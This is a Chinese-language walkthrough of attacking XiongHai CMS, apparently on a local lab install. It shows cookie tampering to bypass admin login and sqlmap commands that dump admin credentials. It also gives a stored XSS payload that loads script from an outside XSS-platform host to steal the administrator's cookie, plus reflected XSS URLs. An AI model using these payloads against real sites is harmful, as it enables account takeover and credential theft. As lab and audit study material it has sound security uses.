CMS下載地址:https://www.jb51.net/codes/303119.html
代碼審計(jì),篡改cookie登錄管理員界面
- 通過信息搜集找到了網(wǎng)站的源碼
this.location='?r=index,發(fā)現(xiàn)登錄后臺的URL
- 查看源碼中登錄驗(yàn)證的代碼
分析:如果cookie中use為空,還是跳回到登錄界面,所以user不為空,則跳過驗(yàn)證,實(shí)現(xiàn)cookie的篡改
通過修改url地址,burp抓包修改cookie
成功登錄到管理員的后臺
一、SQL注入獲取管理員賬號密碼
1. 點(diǎn)開一篇文章,存在get請求參數(shù)
?
2. 手工注入無果,使用sqlmap,后跟-p接指定參數(shù),驗(yàn)證是否存在sql注入
sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid"
?
3. 爆數(shù)據(jù)庫
sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" --dbs
?
4. 爆表
sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" -D xhcms --tables
?
5. 爆字段
sqlmap.py -u "http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" -D xhcms -T manage --columns
?
6. 爆值
sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" -D xhcms -T manage -C user,password --dump
?
7. MD5解密202cb962ac59075b964b07152d234b70 ?為 ?123
得到管理員的賬號密碼 admin /123
可以進(jìn)一步登進(jìn)后臺操作
二、存儲型XSS獲取管理員cookie
1. 在xss平臺上配置監(jiān)聽端口
?
?
2. 復(fù)制代碼,<sCRiPt sRC=http://xss.fbisb.com/tHbs></sCrIpT>
?
3. 在表單中插入xss腳本
?
4. 發(fā)表成功,等待管理員登錄后臺查看留言,
?
?
5. 監(jiān)聽段得到服務(wù)端反彈過來的信息,得到管理員的cookie
?
6. 找到網(wǎng)站后臺,登錄抓包
?
把cookie替換陳管理員的cookie,并且記得要換上面的目標(biāo)網(wǎng)址把login.php換成index.php,需要改多個包,發(fā)包進(jìn)入后臺
?
三、反彈型xss
http://192.168.31.68/?r=content&cid=5' <img src=1 οnerrοr=alert(/xss/)>
http://192.168.31.68/?r=list&class=3&page=1'<img src=1 οnerrοr=alert(/xss/)>文章來源:http://www.zghlxwxcb.cn/news/detail-500736.html
?文章來源地址http://www.zghlxwxcb.cn/news/detail-500736.html
到了這里,關(guān)于熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!